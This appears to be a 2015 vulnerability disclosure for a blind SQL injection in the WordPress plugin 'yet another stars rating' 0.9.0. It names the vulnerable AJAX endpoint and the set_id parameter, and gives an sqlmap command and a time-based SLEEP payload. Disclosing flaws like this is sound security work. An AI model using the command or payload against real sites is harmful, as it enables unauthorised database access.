Subject: Blind SQL injection in yet another stars rating 0.9.0
Date: Mon, 6 Jul 2015 19:45:24 +0200


Plugin: yet another stars rating 0.9.0

Remote authenticated users with 'publish_posts' role can execute arbitrary SQL commands.

1. SQL injection (yasr_get_multi_set_values_and_field())

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=yasr_send_id_nameset
Vulnerable parameter: set_id

Example PHP callstack:
  yasr_output_multiple_set_callback   [/yet-another-stars-rating/lib/yasr-ajax-functions.php:192]
  yasr_get_multi_set_values_and_field   [yet-another-stars-rating/lib/yasr-db-functions.php:220]

Sqlmap verification:

sqlmap --dbms mysql --method POST --data "set_id=1&post_id=1" --cookie "..." -u http://localhost/wp-admin/admin-ajax.php?action=yasr_send_id_nameset -p set_id

Parameter: set_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: set_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FFpb)&post_id=1

Marcin Probola,